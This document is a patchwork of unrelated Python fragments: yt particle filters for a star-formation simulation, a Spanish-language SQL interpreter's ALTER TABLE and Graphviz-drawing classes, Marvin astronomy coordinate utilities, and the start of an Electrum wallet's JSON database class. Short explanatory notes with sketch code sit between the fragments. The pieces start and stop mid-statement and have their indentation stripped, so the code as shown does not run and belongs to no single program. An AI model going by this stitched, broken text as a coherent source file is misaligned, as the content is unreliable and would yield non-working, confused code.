('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = filter * (data[(pfilter.filtered_type,'metallicity_fraction')] >= data.ds.parameters['PopIIIMetalCriticalFraction'])
else: # use the Chiaki threshold:
filter = filter * data[(pfilter.filtered_type,'particle_above_chiaki_threshold')].astype(bool)
return filter
@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_remnants')
def direct_collapse_remnant(pfilter, data):
filter = data[(pfilter.filtered_type, "birth_mass")] > data.ds.parameters['IndividualStarDirectCollapseThreshold']
if ('IndividualStarPopIIIFormation' in data.ds.parameters) and\
('PopIIIMetalCriticalFraction' in data.ds.parameters):
if data.ds.parameters['IndividualStarPopIIIFormation'] > 0:
if data.ds.parameters['PopIIIMetalCriticalFraction'] > 0:
filter = filter * (data[(pfilter.filtered_type,'metallicity_fraction')] >= data.ds.parameters['PopIIIMetalCriticalFraction'])
else: # use the Chiaki threshold:
filter = filter * data[(pfilter.filtered_type,'particle_above_chiaki_threshold')].astype(bool)
return filter
ds.add_particle_filter('all_remnants')
ds.add_particle_filter('popIII_ccsne_remnant')
ds.add_particle_filter('popIII_pisne_remnant')
ds.add_particle_filter('ccsne_remnant')
ds.add_particle_filter('direct_collapse_remnant')
ds.add_particle_filter('popIII_direct_collapse_remnant')
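The filters above build particle masks by multiplying boolean arrays, which only works when every comparison is parenthesized: NumPy's `*` binds tighter than `<`, so `mask * values < threshold` scales the values first and then compares. A minimal sketch (the mass window and critical fraction are hypothetical values, not Enzo parameters):

```python
import numpy as np

birth_mass = np.array([5.0, 15.0, 30.0, 150.0])
metallicity = np.array([1e-8, 1e-3, 1e-8, 1e-9])
z_crit = 1e-6  # hypothetical critical metal fraction

# Each comparison is parenthesized, so `*` acts as elementwise AND on masks.
pop3 = metallicity < z_crit
ccsne = (birth_mass >= 11.0) * (birth_mass <= 40.0)  # hypothetical mass window
mask = pop3 * ccsne                                  # -> [False, False, True, False]

# Without parentheses the expression parses as (pop3 * metallicity) < z_crit:
# excluded particles become 0.0, and 0.0 < z_crit is True, silently
# selecting exactly the particles the filter meant to drop.
```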
#
# this is the same as selecting for WD's
#
#@yt.particle_filter(requires=["particle_type",'birth_mass'], filtered_type='all_stars')
#def agb_remnant(pfilter, data):
# filter = data[(pfilter.filtered_type, "particle_type")] == 12
#
# filter = filter * ( (data[(pfilter.filtered_type,'birth_mass')] >= data.ds.parameters['IndividualStarWDMinimumMass']) *
# (data[(pfilter.filtered_type,'birth_mass')] <= data.ds.parameters['IndividualStarWDMaximumMass']))
# return filter
#ds.add_particle_filter("agb_remnant")
#
#
# SNIa particle filters
#
#
@yt.particle_filter(requires=["particle_type",'birth_mass','snia_sch_metal_fraction','snia_sds_metal_fraction',
'snia_hers_metal_fraction',
'snia_metal_fraction'], filtered_type='all_stars')
def | |
else:
TRef.alterField(DB_ACTUAL.getName(), self.tabla, subaccion.campo, 'Null', False)
elif isinstance(self.accion, AlterTableDrop):
if self.accion.tipo == ALTER_TABLE_DROP.COLUMN:
sint = self.accion.ejecutar(ts)
# Check that the column exists
if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.undefined_column), 0)
dropField = TRef.alterDropColumn(DB_ACTUAL.getName(), self.tabla, sint)
if dropField == 1:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.data_exception), 0)
elif dropField == 4:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
elif dropField == 6:
return ErrorReport('Semantico', 'Error: A table cannot be empty', 0)
else:
if not TRef.constraintExist(DB_ACTUAL.getName(),self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
colPres = TRef.getConstraint(DB_ACTUAL.getName(),self.tabla, self.accion.nombre)
if not isinstance(colPres, tuple):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.data_exception), 0)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], colPres[1], None)
if colPres[1] == 'PKConst':
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'PK', False)
DBMS.alterDropPK(DB_ACTUAL.getName(), self.tabla)
DBMS.alterAddPK(DB_ACTUAL.getName(), self.tabla, TRef.getIndexPK(DB_ACTUAL.getName(), self.tabla))
elif colPres[1] == 'FKConst':
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'FK', False)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'References', None)
elif colPres[1] == 'UniqueConst':
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'Unique', False)
else:
TRef.alterField(DB_ACTUAL.getName(), self.tabla, colPres[0], 'Check', None)
elif isinstance(self.accion, AlterTableAdd):
colSint = self.accion.ejecutar(ts)
if isinstance(colSint, ErrorReport):
return colSint
if self.accion.tipo == ALTER_TABLE_ADD.COLUMN:
if TRef.columnExist(DB_ACTUAL.getName(), self.tabla, self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.duplicate_column), 0)
tipo = None
largo = None
if isinstance(self.accion.accion, tuple):
tipo = self.accion.accion[0].value
if isinstance(self.accion.accion[1],tuple):
largo = {'Precision': self.accion.accion[1][0],'Scale': self.accion.accion[1][1]}
else:
largo = self.accion.accion[1]
elif isinstance(self.accion.accion, str):
tipo = self.accion.accion
else:
tipo = self.accion.accion.value
atributos = dict(
{
"Type": tipo,
"Lenght": largo,
"Default": None,
"Null": True,
"PK": False,
"PKConst": None,
"FK": False,
"References": None,
"FKConst": None,
"Unique": False,
"UniqueConst": None,
"Check": None,
"CheckConst": None
}
)
TRef.alterAddColumn(DB_ACTUAL.getName(), self.tabla, self.accion.nombre, atributos)
DBMS.alterAddColumn(DB_ACTUAL.getName(), self.tabla, None)
elif self.accion.tipo == ALTER_TABLE_ADD.FOREIGN_KEY:
if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,colSint[0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference),0)
elif TRef.getColumns(DB_ACTUAL.getName(),self.tabla)[colSint[0]]['Type'] != TRef.getColumns(DB_ACTUAL.getName(),colSint[1])[colSint[2]]['Type']:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_data_type), 0)
TRef.alterAddFK(DB_ACTUAL.getName(),self.tabla,colSint[0],{'Table':colSint[1],'Field':colSint[2]})
TRef.alterField(DB_ACTUAL.getName(),self.tabla,colSint[0],'FKConst',colSint[3])
elif self.accion.tipo == ALTER_TABLE_ADD.MULTI_FOREIGN_KEY:
# Process each column
for i in range(len(colSint)):
if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,colSint[i][0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference),0)
elif TRef.getColumns(DB_ACTUAL.getName(),self.tabla)[colSint[i][0]]['Type'] != TRef.getColumns(DB_ACTUAL.getName(),colSint[i][1])[colSint[i][2]]['Type']:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_data_type), 0)
TRef.alterAddFK(DB_ACTUAL.getName(),self.tabla,colSint[i][0],{'Table':colSint[i][1],'Field':colSint[i][2]})
elif self.accion.tipo == ALTER_TABLE_ADD.CHECKS:
auxCols = TRef.getColumns(DB_ACTUAL.getName(),self.tabla)
if not colSint[0] in auxCols:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference), 0)
auxCols[colSint[0]]['Check'] = colSint[0] + ' != ' + colSint[1]
else:
if not TRef.columnExist(DB_ACTUAL.getName(),self.tabla,self.accion.nombre):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.invalid_column_reference), 0)
elif TRef.constraintExist(DB_ACTUAL.getName(),self.accion.accion):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
elif TRef.getAttribute(DB_ACTUAL.getName(),self.tabla,self.accion.nombre, 'UniqueConst') != None:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, self.accion.nombre, 'UniqueConst', self.accion.accion)
TRef.alterField(DB_ACTUAL.getName(), self.tabla, self.accion.nombre, 'Unique', True)
return 'Alter table complete'
# Alter Field: changes the type to varchar or toggles nullability
class AlterField(Instruccion):
def __init__(self, campo, cantidad = None):
self.campo = campo
self.cantidad = cantidad
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador
if self.cantidad:
nodo += "[ label = \"ALTER COLUMN " + self.campo + " TYPE\" ];"
nodo += "\nTYPE" + identificador + "[ label = \"VARCHAR(" + str(self.cantidad) + ")\" ];"
nodo += "\n" + identificador + " -> TYPE" + identificador + ";\n"
else:
nodo += "[ label = \"ALTER COLUMN " + self.campo + " SET\" ];"
nodo += "\nVALUE" + identificador + "[ label = \"NOT NULL\" ];"
nodo += "\n" + identificador + " -> VALUE" + identificador + ";\n"
return nodo
def ejecutar(self, ts):
# Check whether the column exists
if self.cantidad:
if isinstance(self.cantidad, int):
if self.cantidad < 0:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.numeric_value_out_of_range),0)
return self.cantidad
elif isinstance(self.cantidad, tuple):
return self.cantidad
elif isinstance(self.cantidad, str):
return self.cantidad
else:
return self.cantidad.value
else:
return False
# Alter Table Drop: encapsulates both constraint and column drops
class AlterTableDrop(Instruccion):
def __init__(self, nombre, tipo):
self.nombre = nombre
self.tipo = tipo
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador
if self.tipo == ALTER_TABLE_DROP.CONSTRAINT:
nodo += "[ label = \"DROP CONSTRAINT\" ];"
else:
nodo += "[ label = \"DROP COLUMN\" ];"
nodo += "\nNAME" + identificador + "[ label = \"" + self.nombre + "\" ];"
nodo += "\n" + identificador + " -> NAME" + identificador + ";\n"
return nodo
def ejecutar(self, ts):
return self.nombre
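Each `dibujar` method above serializes one AST node into a Graphviz DOT fragment, using the object's hash as a unique node id and directed edges to child label nodes. A stripped-down sketch of the same pattern (class and field names are illustrative only):

```python
class DropNode:
    """Illustrative node mirroring AlterTableDrop's DOT emission."""
    def __init__(self, nombre, is_constraint):
        self.nombre = nombre
        self.is_constraint = is_constraint

    def dibujar(self):
        ident = str(hash(self))
        label = "DROP CONSTRAINT" if self.is_constraint else "DROP COLUMN"
        nodo = "\n" + ident + '[ label = "' + label + '" ];'
        # Child node holding the target name, linked by a directed edge.
        nodo += "\nNAME" + ident + '[ label = "' + self.nombre + '" ];'
        nodo += "\n" + ident + " -> NAME" + ident + ";\n"
        return nodo
```

Wrapping the concatenated fragments in `digraph { ... }` yields a renderable DOT graph.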
# Alter add
class AlterTableAdd(Instruccion):
def __init__(self, nombre, tipo, accion):
self.nombre = nombre
self.tipo = tipo
self.accion = accion
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador
if self.tipo == ALTER_TABLE_ADD.UNIQUE:
nodo += "[ label = \"ADD UNIQUE " + self.nombre + "\" ];"
nodo += "\nNAME" + identificador + "[ label = \"" + self.nombre + "\" ];"
nodo += "\n" + identificador + " -> NAME" + identificador + ";"
nodo += "\nID" + identificador + "[ label = \"" + self.accion + "\" ];"
nodo += "\n" + identificador + " -> ID" + identificador + ";\n"
elif self.tipo == ALTER_TABLE_ADD.FOREIGN_KEY:
nodo += "[ label = \"ADD CONSTRAINT " + self.nombre + " FOREIGN KEY\" ];"
nodo += "\n" + identificador + " -> " + str(hash(self.accion[0])) +"\n"
nodo += "\n" + str(hash(self.accion[0])) + "[ label = \"" + self.accion[0] + "." + self.accion[1] + "\" ]"
nodo += "\n" + identificador + " -> " + str(hash(self.accion[2])) +"\n"
nodo += "\n" + str(hash(self.accion[2])) + "[ label = \"CONSTRAINT: " + self.accion[2] + "\" ]"
elif self.tipo == ALTER_TABLE_ADD.MULTI_FOREIGN_KEY:
nodo += "[ label = \"ADD FOREIGN KEY\" ];"
for local in self.nombre:
nodo += "\n" + str(hash(local)) + "[ label =\"" + local + "\" ];"
nodo += "\n" + identificador + " -> " + str(hash(local)) + ";"
nodo += "\nTABLA" + identificador + "[ label = \"" + self.accion[0] + "\" ];"
nodo += "\n" + identificador + " -> TABLA" + identificador + ";"
for foraneo in self.accion[1]:
nodo += "\n" + str(hash(foraneo)) + "[ label =\"" + foraneo + "\" ];"
nodo += "\nTABLA" + identificador + " -> " + str(hash(foraneo)) + ";"
elif self.tipo == ALTER_TABLE_ADD.CHECKS:
nodo += "[ label = \"ADD CHECKS\" ]"
nodo += "\nNAME" + identificador + "[ label = \"" + self.nombre + "\" ];"
nodo += "\n" + identificador + " -> NAME" + identificador + ";"
nodo += "\nACTION" + identificador + "[ label = \"" + self.accion + "\" ];"
nodo += "\n" + identificador + " -> ACTION" + identificador + ";\n"
else:
aux = self.accion
if isinstance(self.accion, tuple):
aux = self.accion[0].value
if isinstance(self.accion[1], tuple):
aux += "(" + str(self.accion[1][0]) + "," + str(self.accion[1][1]) + ")"
else:
aux += "(" + str(self.accion[1]) + ")"
elif isinstance(self.accion, str):
pass
else:
aux = self.accion.value
nodo += "[ label = \"ADD COLUMN " + self.nombre + " " + aux + "\" ];"
return nodo
def ejecutar(self, ts):
if self.tipo == ALTER_TABLE_ADD.FOREIGN_KEY:
if TRef.constraintExist(DB_ACTUAL.getName(),self.accion[2]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_integrity_constraint_violation.integrity_constraint_violation), 0)
if not TRef.tableExist(DB_ACTUAL.getName(),self.accion[0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_table_not_found), 0)
if not TRef.columnExist(DB_ACTUAL.getName(), self.accion[0], self.accion[1]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_column_number), 0)
return (self.nombre,self.accion[0],self.accion[1],self.accion[2])
elif self.tipo == ALTER_TABLE_ADD.MULTI_FOREIGN_KEY:
if not TRef.tableExist(DB_ACTUAL.getName(),self.accion[0]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_table_not_found), 0)
# Check that the number of local ids matches the number of foreign ids
if len(self.nombre) != len(self.accion[1]):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.data_exception), 0)
for col in self.accion[1]:
if not TRef.columnExist(DB_ACTUAL.getName(), self.accion[0], col):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_fdw_error.fdw_invalid_column_number), 0)
listaSin = list()
for i in range(len(self.nombre)):
listaSin.append( (self.nombre[i], self.accion[0], self.accion[1][i]) )
return listaSin
elif self.tipo == ALTER_TABLE_ADD.COLUMN:
if isinstance(self.accion, tuple):
if self.accion[1] < 1:
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_data_exception.numeric_value_out_of_range), 0)
elif isinstance(self.accion, str):
# Check that the chosen type exists
if not TEnum.enumExist(self.accion):
return ErrorReport('Semantico', sqlErrors.sqlErrorToString(sqlErrors.sql_error_syntax_error_or_access_rule_violation.indeterminate_datatype), 0)
return (self.nombre, self.accion)
# Show Database
class ShowDatabase(Instruccion):
def __init__(self, like = None):
self.like = like
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador + "[ label = \"SHOW DATABASE\" ];"
if self.like:
nodo += "\nLIKE" + identificador + "[ label = \"" + self.like + "\" ];"
nodo += "\n" + identificador + " -> LIKE" + identificador + ";"
return nodo
def ejecutar(self, ts):
display = 'Databases\n---------------------\n'
databases = TRef.showDatabases()
for db in databases:
display += db + '\n'
return display
# Drop Database
class DropDatabase(Instruccion):
def __init__(self, db, existencia = False):
self.db = db
self.existencia = existencia
def dibujar(self):
identificador = str(hash(self))
nodo = "\n" + identificador + "[ label = \"DROP DATABASE " + self.db + "\" ];"
if self.existencia:
nodo += "\nLIKE" + identificador + "[ label = \"IF | |
#!/usr/bin/env python
# encoding: utf-8
#
# @Author: <NAME>
# @Date: Nov 1, 2017
# @Filename: general.py
# @License: BSD 3-Clause
# @Copyright: <NAME>
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import collections
import inspect
import sys
import warnings
import contextlib
import re
from collections import OrderedDict
from builtins import range
import numpy as np
from scipy.interpolate import griddata
import matplotlib.pyplot as plt
import PIL
from astropy import table
from astropy import wcs
from astropy.units.quantity import Quantity
import marvin
from marvin import log
from marvin.core.exceptions import MarvinError, MarvinUserWarning
from marvin.utils.datamodel.dap.plotting import get_default_plot_params
try:
from sdss_access import RsyncAccess, AccessError
except ImportError as e:
RsyncAccess = None
try:
from sdss_access.path import Path
except ImportError as e:
Path = None
try:
import pympler.summary
import pympler.muppy
import psutil
except ImportError as e:
pympler = None
psutil = None
# General utilities
__all__ = ('convertCoords', 'parseIdentifier', 'mangaid2plateifu', 'findClosestVector',
'getWCSFromPng', 'convertImgCoords', 'getSpaxelXY',
'downloadList', 'getSpaxel', 'get_drpall_row', 'getDefaultMapPath',
'getDapRedux', 'get_nsa_data', '_check_file_parameters', 'get_plot_params',
'invalidArgs', 'missingArgs', 'getRequiredArgs', 'getKeywordArgs',
'isCallableWithArgs', 'map_bins_to_column', '_sort_dir',
'get_dapall_file', 'temp_setattr', 'map_dapall', 'turn_off_ion', 'memory_usage')
drpTable = {}
def getSpaxel(cube=True, maps=True, modelcube=True,
x=None, y=None, ra=None, dec=None, xyorig=None, **kwargs):
"""Returns the |spaxel| matching certain coordinates.
The coordinates of the spaxel to return can be input as ``x, y`` pixels
relative to ``xyorig`` in the cube, or as ``ra, dec`` celestial
coordinates.
This function is intended to be called by
:func:`~marvin.tools.cube.Cube.getSpaxel` or
:func:`~marvin.tools.maps.Maps.getSpaxel`, and provides shared code for
both of them.
Parameters:
cube (:class:`~marvin.tools.cube.Cube` or None or bool)
A :class:`~marvin.tools.cube.Cube` object with the DRP cube
data from which the spaxel spectrum will be extracted. If None,
the |spaxel| object(s) returned won't contain spectral information.
maps (:class:`~marvin.tools.maps.Maps` or None or bool)
As ``cube`` but for the :class:`~marvin.tools.maps.Maps`
object representing the DAP maps entity. If None, the |spaxel|
will be returned without DAP information.
modelcube (:class:`~marvin.tools.modelcube.ModelCube` or None or bool)
As ``cube`` but for the :class:`~marvin.tools.modelcube.ModelCube`
object representing the DAP modelcube entity. If None, the |spaxel|
will be returned without model information.
x,y (int or array):
The spaxel coordinates relative to ``xyorig``. If ``x`` is an
array of coordinates, the size of ``x`` must match that of
``y``.
ra,dec (float or array):
The coordinates of the spaxel to return. The closest spaxel to
those coordinates will be returned. If ``ra`` is an array of
coordinates, the size of ``ra`` must match that of ``dec``.
xyorig ({'center', 'lower'}):
The reference point from which ``x`` and ``y`` are measured.
Valid values are ``'center'``, for the centre of the
spatial dimensions of the cube, or ``'lower'`` for the
lower-left corner. This keyword is ignored if ``ra`` and
``dec`` are defined. ``xyorig`` defaults to
``marvin.config.xyorig``.
kwargs (dict):
Arguments to be passed to `~marvin.tools.spaxel.SpaxelBase`.
Returns:
spaxels (list):
The |spaxel| objects for this cube/maps corresponding to the input
coordinates. The length of the list is equal to the number
of input coordinates.
.. |spaxel| replace:: :class:`~marvin.tools.spaxel.Spaxel`
"""
# TODO: for now let's put these imports here, but we should fix the
# circular imports soon.
import marvin.tools.cube
import marvin.tools.maps
import marvin.tools.modelcube
import marvin.tools.spaxel
# Checks that the cube and maps data are correct
assert cube or maps or modelcube, \
'Either cube, maps, or modelcube needs to be specified.'
assert isinstance(cube, (marvin.tools.cube.Cube, bool)), \
'cube is not an instance of Cube or a boolean'
assert isinstance(maps, (marvin.tools.maps.Maps, bool)), \
'maps is not an instance of Maps or a boolean'
assert isinstance(modelcube, (marvin.tools.modelcube.ModelCube, bool)), \
'modelcube is not an instance of ModelCube or a boolean'
# Checks that we have the correct set of inputs.
if x is not None or y is not None:
assert ra is None and dec is None, 'Either use (x, y) or (ra, dec)'
assert x is not None and y is not None, 'Specify both x and y'
inputMode = 'pix'
isScalar = np.isscalar(x)
x = np.atleast_1d(x)
y = np.atleast_1d(y)
coords = np.array([x, y], dtype=float).T
elif ra is not None or dec is not None:
assert x is None and y is None, 'Either use (x, y) or (ra, dec)'
assert ra is not None and dec is not None, 'Specify both ra and dec'
inputMode = 'sky'
isScalar = np.isscalar(ra)
ra = np.atleast_1d(ra)
dec = np.atleast_1d(dec)
coords = np.array([ra, dec], dtype=float).T
else:
raise ValueError('You need to specify either (x, y) or (ra, dec)')
if not xyorig:
xyorig = marvin.config.xyorig
if isinstance(maps, marvin.tools.maps.Maps):
ww = maps.wcs if inputMode == 'sky' else None
cube_shape = maps._shape
elif isinstance(cube, marvin.tools.cube.Cube):
ww = cube.wcs if inputMode == 'sky' else None
cube_shape = cube._shape
elif isinstance(modelcube, marvin.tools.modelcube.ModelCube):
ww = modelcube.wcs if inputMode == 'sky' else None
cube_shape = modelcube._shape
iCube, jCube = zip(convertCoords(coords, wcs=ww, shape=cube_shape,
mode=inputMode, xyorig=xyorig).T)
_spaxels = []
for ii in range(len(iCube[0])):
_spaxels.append(
marvin.tools.spaxel.SpaxelBase(jCube[0][ii], iCube[0][ii],
cube=cube, maps=maps, modelcube=modelcube,
**kwargs))
if len(_spaxels) == 1 and isScalar:
return _spaxels[0]
else:
return _spaxels
def convertCoords(coords, mode='sky', wcs=None, xyorig='center', shape=None):
"""Convert input coordinates to array indices.
Converts input positions in x, y or RA, Dec coordinates to array indices
(in Numpy style) or spaxel extraction. In case of pixel coordinates, the
origin of reference (either the center of the cube or the lower left
corner) can be specified via ``xyorig``.
If ``shape`` is defined (mandatory for ``mode='pix'``, optional for
``mode='sky'``) and one or more of the resulting indices are outside the
size of the input shape, an error is raised.
This function is mostly intended for internal use.
Parameters:
coords (array):
The input coordinates, as an array of shape Nx2.
mode ({'sky', 'pix'}):
The type of input coordinates, either `'sky'` for celestial
coordinates (in the format defined in the WCS header information),
or `'pix'` for pixel coordinates.
wcs (None or ``astropy.wcs.WCS`` object):
If ``mode='sky'``, the WCS solution from which the cube coordinates
can be derived.
xyorig (str):
If ``mode='pix'``, the reference point from which the coordinates
are measured. Valid values are ``'center'``, for the centre of the
spatial dimensions of the cube, or ``'lower'`` for the lower-left
corner.
shape (None or array):
If ``mode='pix'``, the shape of the spatial dimensions of the cube,
so that the central position can be calculated.
Returns:
result (Numpy array):
An array with the same shape as ``coords``, containing the cube
index positions for the input coordinates, in Numpy style (i.e.,
the first element being the row and the second the column).
"""
coords = np.atleast_2d(coords)
assert coords.shape[1] == 2, 'coordinates must be an array Nx2'
if mode == 'sky':
assert wcs, 'if mode==sky, wcs must be defined.'
coordsSpec = np.ones((coords.shape[0], 3), np.float32)
coordsSpec[:, :-1] = coords
cubeCoords = wcs.wcs_world2pix(coordsSpec, 0)
cubeCoords = np.fliplr(np.array(np.round(cubeCoords[:, :-1]), dtype=int))
elif mode in ['pix', 'pixel']:
assert xyorig, 'if mode==pix, xyorig must be defined.'
x = coords[:, 0]
y = coords[:, 1]
assert shape is not None, 'if mode==pix, shape must be defined.'
shape = np.atleast_1d(shape)
if xyorig == 'center':
yMid, xMid = shape / 2.
xCube = np.round(xMid + x)
yCube = np.round(yMid + y)
elif xyorig == 'lower':
xCube = np.round(x)
yCube = np.round(y)
else:
raise ValueError('xyorig must be center or lower.')
cubeCoords = np.array([yCube, xCube], dtype=int).T
else:
raise ValueError('mode must be pix or sky.')
if shape is not None:
if ((cubeCoords < 0).any() or
(cubeCoords[:, 0] > (shape[0] - 1)).any() or
(cubeCoords[:, 1] > (shape[1] - 1)).any()):
raise MarvinError('some indices are out of limits. '
'``xyorig`` is currently set to "{0}". '
'Try setting ``xyorig`` to "{1}".'
.format(xyorig, 'center' if xyorig == 'lower' else 'lower'))
return cubeCoords
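The `'pix'` branch of `convertCoords` just shifts the input offsets by half the spatial shape (for `xyorig='center'`) and flips to NumPy (row, col) order; a self-contained sketch of that arithmetic:

```python
import numpy as np

def pix_to_index(coords, shape, xyorig='center'):
    """Minimal re-implementation of convertCoords' 'pix' branch:
    map (x, y) offsets to (row, col) array indices."""
    coords = np.atleast_2d(np.asarray(coords, dtype=float))
    x, y = coords[:, 0], coords[:, 1]
    if xyorig == 'center':
        # Offsets are measured from the spatial centre of the cube.
        y_mid, x_mid = np.asarray(shape) / 2.0
        x_cube, y_cube = np.round(x_mid + x), np.round(y_mid + y)
    elif xyorig == 'lower':
        x_cube, y_cube = np.round(x), np.round(y)
    else:
        raise ValueError('xyorig must be center or lower.')
    # Numpy order: first index is the row (y), second the column (x).
    return np.array([y_cube, x_cube], dtype=int).T

# Centre of a 34x34 cube: pix_to_index([(0, 0)], (34, 34)) -> [[17, 17]]
```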
def mangaid2plateifu(mangaid, mode='auto', drpall=None, drpver=None):
"""Return the plate-ifu for a certain mangaid.
Uses either the DB or the drpall file to determine the plate-ifu for
a mangaid. If more than one plate-ifu are available for a certain ifu,
and ``mode='drpall'``, the one with the higher SN2 (calculated as the sum
of redSN2 and blueSN2) will be used. If ``mode='db'``, the most recent one
will be used.
Parameters:
mangaid (str):
The mangaid for which the plate-ifu will be returned.
mode ({'auto', 'drpall', 'db', 'remote'}):
If `'drpall'` or ``'db'``, the drpall file or the local database,
respectively, will be used. If ``'remote'``, a request to the API
will be | |
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import json
import copy
import threading
from .address import Address
from . import bitcoin
from .keystore import bip44_derivation_btc
from . import util
from .util import PrintError, WalletFileException, multisig_type, profiler
# seed_version is now used for the version of the wallet file
OLD_SEED_VERSION = 4 # electrum versions < 2.0
NEW_SEED_VERSION = 11 # electrum versions >= 2.0
FINAL_SEED_VERSION = 17 # electrum >= 2.7 will set this to prevent
# old versions from overwriting new format
class JsonDB(PrintError):
def __init__(self, raw, *, manual_upgrades):
self.lock = threading.RLock()
self.data = {}
self._modified = False
self.manual_upgrades = manual_upgrades
if raw:
self.load_data(raw)
else:
self.put('seed_version', FINAL_SEED_VERSION)
self.output_pretty_json: bool = True
def set_output_pretty_json(self, flag: bool):
self.output_pretty_json = flag
def set_modified(self, b):
with self.lock:
self._modified = b
def modified(self):
return self._modified
def modifier(func):
def wrapper(self, *args, **kwargs):
with self.lock:
self._modified = True
return func(self, *args, **kwargs)
return wrapper
def locked(func):
def wrapper(self, *args, **kwargs):
with self.lock:
return func(self, *args, **kwargs)
return wrapper
@locked
def get(self, key, default=None):
v = self.data.get(key)
if v is None:
v = default
else:
v = copy.deepcopy(v)
return v
@modifier
def put(self, key, value) -> bool:
try:
json.dumps(key, cls=util.MyEncoder)
json.dumps(value, cls=util.MyEncoder)
except Exception:
self.print_error(f"json error: cannot save {repr(key)} ({repr(value)})")
return False
if value is not None:
if self.data.get(key) != value:
self.data[key] = copy.deepcopy(value)
return True
elif key in self.data:
self.data.pop(key)
return True
return False
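`get` deep-copies what it returns and `put` deep-copies what it stores, so callers can never mutate the database's internal state through aliased references; the `@locked`/`@modifier` decorators add the lock and the dirty flag. That contract can be sketched without the decorators:

```python
import copy
import threading

class TinyStore:
    """Sketch of JsonDB's get/put contract: copy on read and write."""
    def __init__(self):
        self.lock = threading.RLock()
        self.data = {}
        self._modified = False

    def get(self, key, default=None):
        with self.lock:
            v = self.data.get(key)
            return default if v is None else copy.deepcopy(v)

    def put(self, key, value):
        with self.lock:
            self._modified = True
            if value is not None:
                if self.data.get(key) != value:
                    self.data[key] = copy.deepcopy(value)
                    return True
            elif key in self.data:
                # Storing None deletes the key, as JsonDB does.
                self.data.pop(key)
                return True
            return False

store = TinyStore()
store.put('labels', {'tx1': 'coffee'})
labels = store.get('labels')
labels['tx1'] = 'mutated'   # caller-side edit does not leak into the store
```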
def commit(self):
pass
@locked
def dump(self):
return json.dumps(
self.data,
indent=4 if self.output_pretty_json else None,
